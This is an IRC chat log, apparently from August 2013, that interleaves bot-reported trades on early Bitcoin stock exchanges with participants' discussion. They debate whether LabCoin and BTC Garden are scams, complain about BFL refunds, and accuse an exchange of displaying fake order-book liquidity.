15:31:04 [BTCTC] [LABCOIN] 1 @ 0.00283 BTC [-] Aug 01 15:31:07 [BTCTC] [LABCOIN] 11 @ 0.002898 = 0.0319 BTC [+] Aug 01 15:31:08 [BTCTC] [LABCOIN] 998 @ 0.002899 = 2.8932 BTC [+] Aug 01 15:31:08 [BTCTC] [LABCOIN] 495 @ 0.0029 = 1.4355 BTC [+] Aug 01 15:31:10 [BTCTC] [LABCOIN] 3699 @ 0.002979 = 11.0193 BTC [+] Aug 01 15:31:11 [BTCTC] [LABCOIN] 1000 @ 0.00298 = 2.98 BTC [+] Aug 01 15:31:12 [BTCTC] [LABCOIN] 100 @ 0.002981 = 0.2981 BTC [+] Aug 01 15:31:25 [BTCTC] [LABCOIN] 1000 @ 0.00299 = 2.99 BTC [+] Aug 01 15:31:27 [BTCTC] [LABCOIN] 10000 @ 0.00299 = 29.9 BTC [+] Aug 01 15:31:58 thanks Aug 01 15:32:15 [BTCTC] [LABCOIN] 1675 @ 0.002995 = 5.0166 BTC [+] Aug 01 15:33:59 [BTCTC] [ASICMINER-PT] 3 @ 4.01 = 12.03 BTC [+] Aug 01 15:34:47 [BTCTC] [LABCOIN] 8 @ 0.00299 = 0.0239 BTC [-] Aug 01 15:35:24 [BTCTC] [LABCOIN] 3 @ 0.00285 = 0.0086 BTC [-] Aug 01 15:35:36 [BTCTC] [ACTIVEMINING] 18 @ 0.006188 = 0.1114 BTC [-] Aug 01 15:35:37 [BTCTC] [ACTIVEMINING] 50 @ 0.006187 = 0.3094 BTC [-] Aug 01 15:36:06 [BTCTC] [ACTIVEMINING] 18 @ 0.00634 = 0.1141 BTC [+] Aug 01 15:36:57 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [+] Aug 01 15:38:08 [BTCTC] [ASICMINER-PT] 3 @ 4.001 = 12.003 BTC [-] Aug 01 15:38:42 [HAVELOCK] [AM1] 1 @ 4.28 BTC [+] Aug 01 15:41:30 [BTCTC] [ASICMINER-PT] 9 @ 4.001 = 36.009 BTC [-] Aug 01 15:41:32 [BTCTC] [ASICMINER-PT] 23 @ 4 = 92 BTC [-] Aug 01 15:41:33 [BTCTC] [ASICMINER-PT] 2 @ 4 = 8 BTC [-] Aug 01 15:41:35 [BTCTC] [ASICMINER-PT] 1 @ 3.99 BTC [-] Aug 01 15:41:36 [BTCTC] [ASICMINER-PT] 3 @ 3.989 = 11.967 BTC [-] Aug 01 15:41:37 [BTCTC] [ASICMINER-PT] 5 @ 3.988 = 19.94 BTC [-] Aug 01 15:41:38 [BTCTC] [ASICMINER-PT] 1 @ 3.985 BTC [-] Aug 01 15:41:39 [BTCTC] [ASICMINER-PT] 3 @ 3.973 = 11.919 BTC [-] Aug 01 15:44:55 [BTCTC] [B.YABMC] 7 @ 0.00232 = 0.0162 BTC [-] Aug 01 15:45:14 G.MPOE and G.BBET are both bought back and closed Aug 01 15:45:21 [BTCTC] [LABCOIN] 75 @ 0.002801 = 0.2101 BTC [-] Aug 01 15:45:24 [BTCTC] [B.YABMC] 1 @ 0.00232 BTC [-] Aug 01 15:45:26 G.SDICE will be bought back and closed in about an hour Aug 01 15:45:28 [BTCTC] [LABCOIN] 150 @ 0.0028 = 0.42 BTC [-] Aug 01 15:45:54 [BTCTC] [B.YABMC] 6 @ 0.00232 = 0.0139 BTC [-] Aug 01 15:46:07 [BTCTC] [LABCOIN] 300 @ 0.0028 = 0.84 BTC [-] Aug 01 15:46:21 bought back? Aug 01 15:46:24 [BTCTC] [B.YABMC] 1 @ 0.002319 BTC [-] Aug 01 15:46:45 [BTCTC] [B.YABMC] 4 @ 0.002303 = 0.0092 BTC [-] Aug 01 15:47:14 [BTCTC] [B.YABMC] 1 @ 0.002302 BTC [-] Aug 01 15:47:40 I purchased back the shares from the PT investors as according to the contract and then closed the asset Aug 01 15:47:45 [BTCTC] [LABCOIN] 125 @ 0.0028 = 0.35 BTC [-] Aug 01 15:47:57 [BTCTC] [BTCGARDEN] 23 @ 0.016 = 0.368 BTC [+] Aug 01 15:47:59 whats up with labcoin quadrupling yesterday Aug 01 15:48:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.03966 = 0.0793 BTC [-] Aug 01 15:48:12 dandate2 http://trilema.com/2013/the-anatomy-of-a-scam/ Aug 01 15:49:45 you guys don't think labcoin will keep going up? Aug 01 15:49:58 not for any good reason Aug 01 15:51:05 we should add a bet on bitbet regarding labcoin :) Aug 01 15:51:14 the labcoin site does say they'll be starting production this month Aug 01 15:51:34 [BTCTC] [LABCOIN] 7 @ 0.002958 = 0.0207 BTC [+] Aug 01 15:51:51 [BTCTC] [GSDPT] 265 @ 0.003479 = 0.9219 BTC [-] Aug 01 15:51:53 [BTCTC] [GSDPT] 1189 @ 0.00348 = 4.1377 BTC [+] Aug 01 15:52:03 MCM-Mike if you can find something verifiable. Aug 01 15:52:26 I was thinking but haven't found anything we could bet on Aug 01 15:52:30 what tho ? they can fullfil their announced schedule of making announcements till the cows come home. Aug 01 15:52:35 [BTCTC] [LABCOIN] 3 @ 0.00292 = 0.0088 BTC [-] Aug 01 15:52:37 myeah. Aug 01 15:54:23 [MPEX] [S.MPOE] 7635 @ 0.00080603 = 6.154 BTC [+] Aug 01 15:57:39 [BTCTC] [LABCOIN] 1 @ 0.002806 BTC [-] Aug 01 15:57:41 [BTCTC] [LABCOIN] 1000 @ 0.002805 = 2.805 BTC [-] Aug 01 15:57:42 [BTCTC] [LABCOIN] 4155 @ 0.0028 = 11.634 BTC [-] Aug 01 15:57:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.03965 = 0.0793 BTC [-] Aug 01 15:57:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.03965 BTC [-] Aug 01 15:58:39 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 01 15:58:41 [BTCTC] [BTCGARDEN] 149 @ 0.016 = 2.384 BTC [+] Aug 01 15:59:18 [BTCTC] [ACTIVEMINING] 23 @ 0.006185 = 0.1423 BTC [-] Aug 01 15:59:20 [BTCTC] [ACTIVEMINING] 30 @ 0.00611 = 0.1833 BTC [-] Aug 01 15:59:21 [BTCTC] [ACTIVEMINING] 270 @ 0.00611 = 1.6497 BTC [-] Aug 01 16:00:16 [MPEX] [S.MG] 10000 @ 0.00024 = 2.4 BTC [-] Aug 01 16:00:53 [BTCTC] [LABCOIN] 48 @ 0.002917 = 0.14 BTC [+] Aug 01 16:01:23 [BTCTC] [ACTIVEMINING] 23 @ 0.006109 = 0.1405 BTC [-] Aug 01 16:01:32 [BTCTC] [DMS.MINING] 20 @ 0.007215 = 0.1443 BTC [-] Aug 01 16:01:44 These recent IPOs make me want to invest in a nice (relatively) stable bond instead Aug 01 16:02:19 Oh wow, and TAT delivers just as I say that Aug 01 16:02:34 tat has one, Namworld too Aug 01 16:02:48 [BTCTC] [ASICMINER-PT] 1 @ 4.089 BTC [+] Aug 01 16:02:50 i think deprived is also doing something but maybe ltc only Aug 01 16:03:05 [BTCTC] [RSM] 1 @ 0.01609 BTC [+] Aug 01 16:04:23 yeah xbond looks very nice Aug 01 16:04:41 [BTCTC] [ACTIVEMINING] 2 @ 0.006199 = 0.0124 BTC [+] Aug 01 16:04:52 the convertibility is novel (not convertible bonds but application towards future IPO's) Aug 01 16:06:50 [BTCTC] [ACTIVEMINING] 551 @ 0.006109 = 3.3661 BTC [-] Aug 01 16:07:12 [BTCTC] [ASICMINER-PT] 1 @ 4.09 BTC [+] Aug 01 16:07:13 [BTCTC] [ASICMINER-PT] 3 @ 4.098 = 12.294 BTC [+] Aug 01 16:07:14 [BTCTC] [ASICMINER-PT] 6 @ 4.099 = 24.594 BTC [+] Aug 01 16:07:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.03964 = 0.3964 BTC [-] Aug 01 16:08:09 [BTCTC] [TAT.ASICMINER] 24 @ 0.03965 = 0.9516 BTC [+] Aug 01 16:09:06 [BTCTC] [ACTIVEMINING] 10 @ 0.00611 = 0.0611 BTC [+] Aug 01 16:09:27 [BTCTC] [LABCOIN] 500 @ 0.002751 = 1.3755 BTC [-] Aug 01 16:09:28 [BTCTC] [LABCOIN] 1000 @ 0.00275 = 2.75 BTC [-] Aug 01 16:10:04 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 16:10:22 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 01 16:10:25 [BTCTC] [LABCOIN] 27 @ 0.002913 = 0.0787 BTC [+] Aug 01 16:10:26 [BTCTC] [LABCOIN] 473 @ 0.002913 = 1.3778 BTC [+] Aug 01 16:10:42 [BTCTC] [BTCGARDEN] 810 @ 0.016 = 12.96 BTC [+] Aug 01 16:11:19 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 01 16:11:22 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 01 16:11:39 [BTCTC] [LABCOIN] 300 @ 0.0029 = 0.87 BTC [-] Aug 01 16:11:41 why can't we buy S.MPOE on btctc? Aug 01 16:11:47 [BTCTC] [LABCOIN] 2000 @ 0.0029 = 5.8 BTC [-] Aug 01 16:12:22 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 16:12:24 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 01 16:12:58 [HAVELOCK] [AM100] 1 @ 0.0377 BTC [+] Aug 01 16:13:01 [BTCTC] [TAT.ASICMINER] 24 @ 0.0397 = 0.9528 BTC [+] Aug 01 16:13:02 [BTCTC] [TAT.ASICMINER] 59 @ 0.04 = 2.36 BTC [+] Aug 01 16:13:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.04032 BTC [+] Aug 01 16:15:13 [BTCTC] [LABCOIN] 1000 @ 0.00274 = 2.74 BTC [-] Aug 01 16:15:15 [BTCTC] [LABCOIN] 1000 @ 0.002739 = 2.739 BTC [-] Aug 01 16:15:16 [BTCTC] [LABCOIN] 2634 @ 0.002738 = 7.2119 BTC [-] Aug 01 16:15:18 [BTCTC] [LABCOIN] 248 @ 0.002736 = 0.6785 BTC [-] Aug 01 16:15:19 [BTCTC] [LABCOIN] 20 @ 0.002736 = 0.0547 BTC [-] Aug 01 16:15:20 [BTCTC] [LABCOIN] 5000 @ 0.002735 = 13.675 BTC [-] Aug 01 16:15:52 [BTCTC] [LABCOIN] 618 @ 0.00268 = 1.6562 BTC [-] Aug 01 16:16:22 [BTCTC] [LABCOIN] 1 @ 0.002801 BTC [+] Aug 01 16:16:24 [BTCTC] [LABCOIN] 8 @ 0.00268 = 0.0214 BTC [-] Aug 01 16:17:40 [BTCTC] [LABCOIN] 511 @ 0.00268 = 1.3695 BTC [-] Aug 01 16:17:42 [BTCTC] [LABCOIN] 102 @ 0.002672 = 0.2725 BTC [-] Aug 01 16:17:43 [BTCTC] [LABCOIN] 10 @ 0.002672 = 0.0267 BTC [-] Aug 01 16:17:44 [BTCTC] [LABCOIN] 172 @ 0.002671 = 0.4594 BTC [-] Aug 01 16:18:29 [BTCTC] [LABCOIN] 17 @ 0.0028 = 0.0476 BTC [+] Aug 01 16:18:58 [BTCTC] [LABCOIN] 2779 @ 0.0027 = 7.5033 BTC [-] Aug 01 16:19:23 [HAVELOCK] [AM100] 1 @ 0.038 BTC [+] Aug 01 16:19:36 [BTCTC] [ACTIVEMINING] 213 @ 0.00611 = 1.3014 BTC [+] Aug 01 16:20:17 [BTCTC] [ACTIVEMINING] 87 @ 0.006109 = 0.5315 BTC [-] Aug 01 16:20:17 [BTCTC] [LABCOIN] 1000 @ 0.0028 = 2.8 BTC [+] Aug 01 16:20:45 [BTCTC] [BASIC-MINING] 2 @ 0.442 = 0.884 BTC [+] Aug 01 16:21:01 [BTCTC] [LABCOIN] 338 @ 0.0028 = 0.9464 BTC [+] Aug 01 16:21:11 Here's one way to start your morning... http://www.amazon.com/review/R3FTHSH0UNRHOH/ref=cm_cr_dp_title?ie=UTF8&ASIN=B000EVQWKC&nodeID=16310101&store=grocery Aug 01 16:22:47 [BTCTC] [BTCGARDEN] 3400 @ 0.016 = 54.4 BTC [+] Aug 01 16:23:02 [BTCTC] [BTCGARDEN] 59 @ 0.016 = 0.944 BTC [+] Aug 01 16:23:07 [BTCTC] [BTCGARDEN] 600 @ 0.016 = 9.6 BTC [+] Aug 01 16:24:16 [BTCTC] [DMS.MINING] 20 @ 0.007216 = 0.1443 BTC [+] Aug 01 16:26:18 [BTCTC] [LABCOIN] 15 @ 0.002788 = 0.0418 BTC [-] Aug 01 16:26:47 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 16:26:50 [BTCTC] [ACTIVEMINING] 5 @ 0.006199 = 0.031 BTC [+] Aug 01 16:27:06 [BTCTC] [LABCOIN] 30 @ 0.002789 = 0.0837 BTC [+] Aug 01 16:27:14 [BTCTC] [LABCOIN] 4527 @ 0.0027 = 12.2229 BTC [-] Aug 01 16:28:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.04185 = 0.1256 BTC [+] Aug 01 16:29:17 [BTCTC] [LABCOIN] 19 @ 0.002799 = 0.0532 BTC [+] Aug 01 16:29:36 [BTCTC] [LABCOIN] 10 @ 0.002799 = 0.028 BTC [+] Aug 01 16:30:18 [BTCTC] [ACTIVEMINING] 169 @ 0.00611 = 1.0326 BTC [-] Aug 01 16:30:20 [BTCTC] [ACTIVEMINING] 171 @ 0.006109 = 1.0446 BTC [-] Aug 01 16:31:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.04185 BTC [+] Aug 01 16:32:50 [BTCTC] [TAT.ASICMINER] 9 @ 0.04186 = 0.3767 BTC [+] Aug 01 16:33:17 [BTCTC] [LABCOIN] 338 @ 0.002799 = 0.9461 BTC [+] Aug 01 16:35:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.04189 = 0.0838 BTC [+] Aug 01 16:35:27 [BTCTC] [LABCOIN] 6 @ 0.002799 = 0.0168 BTC [+] Aug 01 16:36:21 [BTCTC] [LABCOIN] 30 @ 0.002799 = 0.084 BTC [+] Aug 01 16:36:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.04189 = 0.2095 BTC [+] Aug 01 16:36:50 Am I crazy or did BFL say they would refund orders that were placed before May? They're trying to pull some shit on me. Aug 01 16:37:23 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 16:37:32 Rulother_ they said they will refund all orders Aug 01 16:37:40 Yeah that's what I thought Aug 01 16:37:42 then they said they'll refund all orders at usd value Aug 01 16:37:49 and that's fine Aug 01 16:37:50 then they said they'll refund all orders made prior to x date Aug 01 16:37:54 and now they're not refunding anyone. Aug 01 16:38:26 [BTCTC] [LABCOIN] 30 @ 0.002799 = 0.084 BTC [+] Aug 01 16:38:40 [BTCTC] [ASICMINER-PT] 1 @ 4.13 BTC [+] Aug 01 16:39:06 [HAVELOCK] [AM100] 4 @ 0.039688 = 0.1588 BTC [+] Aug 01 16:39:49 Just hang in there, they will deliver before next year. Aug 01 16:39:57 Yeah I'm trying to cancel out a couple of singles, as I doubt they'll be useful by the time they actually ship em Aug 01 16:40:14 [BTCTC] [LABCOIN] 10 @ 0.002789 = 0.0279 BTC [-] Aug 01 16:40:21 im still waiting on mines Aug 01 16:40:24 Paper weights Aug 01 16:40:28 I hate wasting money Aug 01 16:40:36 its only money Aug 01 16:41:07 [HAVELOCK] [AM100] 2 @ 0.0397 = 0.0794 BTC [+] Aug 01 16:41:19 [BTCTC] [DMS.SELLING] 1 @ 0.02429 BTC [+] Aug 01 16:41:26 Sure to a point, but when you're talking bout a couple of thousand, different case :) Aug 01 16:41:42 [BTCTC] [ASICMINER-PT] 2 @ 4.13 = 8.26 BTC [+] Aug 01 16:41:44 [BTCTC] [ASICMINER-PT] 5 @ 4.144 = 20.72 BTC [+] Aug 01 16:42:07 Especially if you were able to get a refund, and that money could of gone to say LC's ipo roll out, I could of 3x my money. Aug 01 16:42:40 [BTCTC] [LABCOIN] 20 @ 0.002789 = 0.0558 BTC [-] Aug 01 16:43:07 [HAVELOCK] [AM100] 1 @ 0.03975 BTC [+] Aug 01 16:43:23 [BTCTC] [BTCGARDEN] 5000 @ 0.016 = 80 BTC [+] Aug 01 16:43:52 Rulother_, people giving money to BFL don't deserve complaining Aug 01 16:43:55 has anyone done better than x20 yet? Aug 01 16:43:59 for ipo Aug 01 16:44:09 Bah Aug 01 16:44:15 i think sandstorm has the record for x20 Aug 01 16:44:32 LC? Aug 01 16:44:37 labcoin Aug 01 16:44:44 if you were in time Aug 01 16:45:06 do you realize what does it make you look like Rulother ? i would be ashamed to even tell... Aug 01 16:45:08 [HAVELOCK] [AM100] 5 @ 0.0398 = 0.199 BTC [+] Aug 01 16:45:13 [BTCTC] [ASICMINER-PT] 9 @ 4.145 = 37.305 BTC [+] Aug 01 16:45:39 I mean I'm not happy with myself either :P Aug 01 16:46:00 [BTCTC] [ASICMINER-PT] 1 @ 4.148 BTC [+] Aug 01 16:46:29 VanCleef http://trilema.com/2013/the-best-investments-in-the-history-of-bitcoin/ Aug 01 16:46:40 read it :) Aug 01 16:46:46 a ok Aug 01 16:46:53 well then... s,mpoe is up what, 80x ? Aug 01 16:47:02 mircea_popescu hahaha wha time zone are you in? you seem to never be asleep :D Aug 01 16:47:03 nice Aug 01 16:47:15 Hiro2 im in multiple timezones Aug 01 16:47:34 seems like it Aug 01 16:47:42 omnimp Aug 01 16:48:46 [BTCTC] [ACTIVEMINING] 3 @ 0.006199 = 0.0186 BTC [+] Aug 01 16:49:12 [BTCTC] [TAT.ASICMINER] 43 @ 0.04189 = 1.8013 BTC [+] Aug 01 16:50:44 [BTCTC] [BTCGARDEN] 99 @ 0.016 = 1.584 BTC [+] Aug 01 16:50:47 [BTCTC] [BTCGARDEN] 80000 @ 0.016 = 1280 BTC [+] Aug 01 16:51:20 [BTCTC] [BTCGARDEN] 156 @ 0.016 = 2.496 BTC [+] Aug 01 16:51:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.0419 = 0.1676 BTC [+] Aug 01 16:52:24 [BTCTC] [TAT.ASICMINER] 22 @ 0.04194 = 0.9227 BTC [+] Aug 01 16:52:24 [BTCTC] [ASICMINER-PT] 2 @ 4.15 = 8.3 BTC [+] Aug 01 16:52:33 Damn Aug 01 16:52:39 1280btc Aug 01 16:53:13 [BTCTC] [KENILWORTH] 10 @ 0.00175 = 0.0175 BTC [+] Aug 01 16:54:46 [BTCTC] [KENILWORTH] 2 @ 0.00175 = 0.0035 BTC [+] Aug 01 16:55:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0402 BTC [-] Aug 01 16:56:11 [BTCTC] [LABCOIN] 30 @ 0.002701 = 0.081 BTC [-] Aug 01 16:57:09 mircea what do you recommend buying? Aug 01 16:57:58 dandate2 i dont recommend buying Aug 01 16:58:05 =) Aug 01 16:58:17 there's some stuff i recommend not buying, and that'sd about the extent of it Aug 01 16:59:18 [BTCTC] [ASICMINER-PT] 1 @ 4.176 BTC [+] Aug 01 16:59:42 [BTCTC] [LABCOIN] 277 @ 0.002788 = 0.7723 BTC [+] Aug 01 17:00:37 asicminer-pt seems to have a lot of volume, is that a scam? Aug 01 17:01:07 asicminer is the one that actually seems to have delivered substantial mining rigs. Aug 01 17:01:08 lol Aug 01 17:01:33 [BTCTC] [BTCGARDEN] 49 @ 0.016 = 0.784 BTC [+] Aug 01 17:01:36 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 17:01:44 [BTCTC] [ACTIVEMINING] 322 @ 0.006199 = 1.9961 BTC [+] Aug 01 17:01:45 [BTCTC] [BTCGARDEN] 625 @ 0.016 = 10 BTC [+] Aug 01 17:01:46 I thought avalon did Aug 01 17:01:48 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 01 17:02:10 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 17:02:14 seems to be in a bear mode Aug 01 17:02:32 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [+] Aug 01 17:02:33 [BTCTC] [ASICMINER-PT] 6 @ 4.122 = 24.732 BTC [-] Aug 01 17:02:42 KRS-1 well they did a first batch, except ppl complained about not getting some, Aug 01 17:02:48 and by now it's not clear wtf. Aug 01 17:02:50 [BTCTC] [LABCOIN] 554 @ 0.002789 = 1.5451 BTC [+] Aug 01 17:02:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.04194 = 0.2097 BTC [+] Aug 01 17:02:53 [BTCTC] [LABCOIN] 1000 @ 0.002797 = 2.797 BTC [+] Aug 01 17:02:54 [BTCTC] [LABCOIN] 646 @ 0.002798 = 1.8075 BTC [+] Aug 01 17:03:06 [BTCTC] [BTCGARDEN] 1888 @ 0.016 = 30.208 BTC [+] Aug 01 17:03:06 asicminer is the only one that actually delivered *something* Aug 01 17:03:13 must be a pretty daunting task, especially with pre-order money. Aug 01 17:03:28 [BTCTC] [BTCGARDEN] 3 @ 0.016 = 0.048 BTC [+] Aug 01 17:03:46 on one hand it's pretty clear *someone* is hashing. Aug 01 17:03:55 i guess i'm going to watch asicminer-pt and jump in when the bear quits Aug 01 17:04:12 but if you want to get puristic about it... asicminer could be faking their output just as werll as anything. Aug 01 17:04:38 [BTCTC] [LABCOIN] 11 @ 0.002798 = 0.0308 BTC [+] Aug 01 17:04:41 [BTCTC] [TAT.ASICMINER] 8 @ 0.04194 = 0.3355 BTC [+] Aug 01 17:05:00 [BTCTC] [BTCGARDEN] 113 @ 0.016 = 1.808 BTC [+] Aug 01 17:05:01 well they can't fake the miners they sell Aug 01 17:05:03 i cant even think of how they could fake it if there are network metrics Aug 01 17:05:10 they seem to pay decent dividend Aug 01 17:05:41 pankkake a that's a good point Aug 01 17:05:47 they have been selling tons of thumb miners, so. Aug 01 17:05:51 also their blocks are "watermarked" Aug 01 17:05:51 prolly as legit as it gets. Aug 01 17:05:51 [BTCTC] [LABCOIN] 10 @ 0.002785 = 0.0279 BTC [-] Aug 01 17:06:00 [BTCTC] [BTCGARDEN] 548 @ 0.016 = 8.768 BTC [+] Aug 01 17:06:03 anyway. bbl. Aug 01 17:06:14 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 01 17:06:15 [BTCTC] [LABCOIN] 1 @ 0.002785 BTC [-] **** BEGIN LOGGING AT Thu Aug 1 22:53:04 2013 Aug 01 22:53:06 [BTCTC] [COGNITIVE] 1 @ 0.5001 BTC [+] Aug 01 22:53:07 [BTCTC] [COGNITIVE] 1 @ 0.5001 BTC [+] Aug 01 22:53:08 [BTCTC] [COGNITIVE] 9 @ 0.5097 = 4.5873 BTC [+] Aug 01 22:53:10 [BTCTC] [COGNITIVE] 1 @ 0.51 BTC [+] Aug 01 22:53:11 [BTCTC] [COGNITIVE] 1 @ 0.5126 BTC [+] Aug 01 22:53:11 [BTCTC] [COGNITIVE] 1 @ 0.522 BTC [+] Aug 01 22:53:25 [BTCTC] [ACTIVEMINING] 1 @ 0.006446 BTC [+] Aug 01 22:55:01 http://www.btcgarden.com/products.do Aug 01 22:55:03 BTC GARDEN Aug 01 22:55:34 .not.exist Aug 01 22:55:36 [HAVELOCK] [LABCO] 107 @ 0.00215 = 0.2301 BTC [+] Aug 01 22:55:41 did you forget the whole suffix ? Aug 01 22:56:22 [BTCTC] [LABCOIN] 30 @ 0.0022 = 0.066 BTC [-] Aug 01 22:57:52 ;;nethash Aug 01 22:57:54 299961.914812 Aug 01 22:58:16 the btcgarden thread is geeting more creepy by the minute Aug 01 22:58:26 5056929133.32942867 btc ask in ActM? Aug 01 22:58:33 5 billion btc Aug 01 22:58:39 [HAVELOCK] [AM100] 130 @ 0.0378 = 4.914 BTC [+] Aug 01 22:58:47 lmao Aug 01 22:58:50 396.613079 BTC bid Aug 01 22:58:52 screenshot all the things Aug 01 22:59:08 it's there now Aug 01 22:59:13 i dun get it Aug 01 23:00:33 mircea, on the topic of le homos ancien Aug 01 23:00:34 where is it? Aug 01 23:00:34 io9.com/gay-marriage-in-the-year-100-ad-951140108 Aug 01 23:01:08 [HAVELOCK] [LABCO] 800 @ 0.00215 = 1.72 BTC [+] Aug 01 23:01:10 "SELLING PAYPAL VERIFIED WITH HIGH BALANCE LAST LOGIN 2013 Country US, AU, CA, SG KR, BE, PH etc" Aug 01 23:01:17 [BTCTC] [BTCGARDEN] 5 @ 0.016 = 0.08 BTC [+] Aug 01 23:01:24 teh scammors are coming in peace bearing gifts. Aug 01 23:01:27 [HAVELOCK] [AM100] 1 @ 0.0388 BTC [+] Aug 01 23:02:36 [BTCTC] [LABCOIN] 5 @ 0.002248 = 0.0112 BTC [+] Aug 01 23:04:04 bearing grifts Aug 01 23:04:13 [HAVELOCK] [LABCO] 1 @ 0.00215 BTC [+] Aug 01 23:04:22 [HAVELOCK] [LABCO] 6 @ 0.00215 = 0.0129 BTC [+] Aug 01 23:04:28 [BTCTC] [LABCOIN] 20 @ 0.002248 = 0.045 BTC [+] Aug 01 23:04:42 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 01 23:04:44 [BTCTC] [LABCOIN] 400 @ 0.002248 = 0.8992 BTC [+] Aug 01 23:04:48 ahaha Aug 01 23:04:50 good1 Aug 01 23:04:57 [HAVELOCK] [SDSTM] 2 @ 0.0087 = 0.0174 BTC [+] Aug 01 23:05:12 [HAVELOCK] [LABCO] 86 @ 0.00215 = 0.1849 BTC [+] Aug 01 23:05:33 5056929133.32942867 btc ask in ActM? < 10000 x 500000 btc ;) it's better to messure asks in shares and not btc obviously Aug 01 23:06:19 [BTCTC] [LABCOIN] 3200 @ 0.002245 = 7.184 BTC [-] Aug 01 23:06:26 right Aug 01 23:06:31 [BTCTC] [LABCOIN] 719 @ 0.002246 = 1.6149 BTC [+] Aug 01 23:06:33 [BTCTC] [LABCOIN] 1081 @ 0.002247 = 2.429 BTC [+] Aug 01 23:07:15 !t m S.MPOE Aug 01 23:07:16 [MPEX:S.MPOE] 1D: 0.0007936 / 0.00080719 / 0.00082066 (394721 shares, 318.62 BTC), 7D: 0.0007725 / 0.00080021 / 0.00087 (2399274 shares, 1,919.94 BTC), 30D: 0.0007725 / 0.00081626 / 0.00097228 (10739835 shares, 8,766.56 BTC) Aug 01 23:08:48 [BTCTC] [LABCOIN] 2918 @ 0.002243 = 6.5451 BTC [-] Aug 01 23:09:45 [BTCTC] [DMS.MINING] 2 @ 0.0084 = 0.0168 BTC [+] Aug 01 23:09:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.04191 = 0.0838 BTC [+] Aug 01 23:10:34 dexX7 you're missing the point. Aug 01 23:10:48 yesterday i was saying burnside lists a fake book and people were doubtful. Aug 01 23:10:55 today the book exceeds the btc in circulation. what now ? Aug 01 23:12:45 so what? Aug 01 23:12:52 i don't get the point Aug 01 23:13:06 [BTCTC] [LABCOIN] 160 @ 0.002271 = 0.3634 BTC [+] Aug 01 23:13:16 wasn't that the complained of jurov and Ukyo a while ago that you can use the same coin multiple times in order books on btct? Aug 01 23:13:20 ofc 504 million btc can't be filled Aug 01 23:13:23 complaint* Aug 01 23:13:45 dexX7: no-one can ever have them Aug 01 23:13:45 [BTCTC] [ACTIVEMINING] 1660 @ 0.006099 = 10.1243 BTC [-] Aug 01 23:13:46 [BTCTC] [ACTIVEMINING] 540 @ 0.0061 = 3.294 BTC [+] Aug 01 23:13:59 but what do you want? a cap for max price so it would be realsitic? Aug 01 23:15:13 FabianB yes. Aug 01 23:15:20 [BTCTC] [ASICMINER-PT] 1 @ 4.171 BTC [+] Aug 01 23:15:40 dexX7 what i'd want is not supporting scammers with fake liquidity, actually. Aug 01 23:16:54 can you provide anything else than a claim for orderbook manipulation by burnside? Aug 01 23:17:29 [HAVELOCK] [AM100] 13 @ 0.0379 = 0.4927 BTC [-] Aug 01 23:17:53 [BTCTC] [LABCOIN] 400 @ 0.00229 = 0.916 BTC [+] Aug 01 23:17:58 i could provide cookies ? Aug 01 23:18:03 because if not, it comes down to "people are scammers till ... i don't know" or "people are no scammers, till they get caught scamming" Aug 01 23:18:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.04151 BTC [-] Aug 01 23:18:17 [BTCTC] [TAT.ASICMINER] 16 @ 0.04151 = 0.6642 BTC [-] Aug 01 23:18:26 you're still missing the point. Aug 01 23:18:51 i'm sorry then, could you rephrase your statement? Aug 01 23:19:42 soft orders create a house of cards Aug 01 23:19:43 looky here : you're all mommentum traders. on one hand this means you don't have a fucking clue and don't contribute anything of value. on the other hand it means it's quite easy to separate you ferom your btc dust : just create an item which *appears* to be in high demand and trading in high volume. Aug 01 23:20:07 this appearance can not be created by the scammer alone, Aug 01 23:20:09 [BTCTC] [ACTIVEMINING] 50 @ 0.006349 = 0.3175 BTC [+] Aug 01 23:20:10 [BTCTC] [ACTIVEMINING] 158 @ 0.00635 = 1.0033 BTC [+] Aug 01 23:20:19 [BTCTC] [LABCOIN] 1000 @ 0.00229 = 2.29 BTC [+] Aug 01 23:20:22 but if some guy creates fake btc in his pretend-exchange then suddenly it's all very feasible. Aug 01 23:20:35 also very criminal. Aug 01 23:21:06 [BTCTC] [DMS.MINING] 1 @ 0.0084 BTC [+] Aug 01 23:21:15 [BTCTC] [LABCOIN] 1500 @ 0.00229 = 3.435 BTC [+] Aug 01 23:21:23 [BTCTC] [ACTIVEMINING] 100 @ 0.006395 = 0.6395 BTC [+] Aug 01 23:21:30 [BTCTC] [ACTIVEMINING] 32 @ 0.00635 = 0.2032 BTC [-] Aug 01 23:22:44 you both refer to the fact that you can open multiple bid orders which would exceed your balance, but get cancled, if one is executed? Aug 01 23:22:57 [BTCTC] 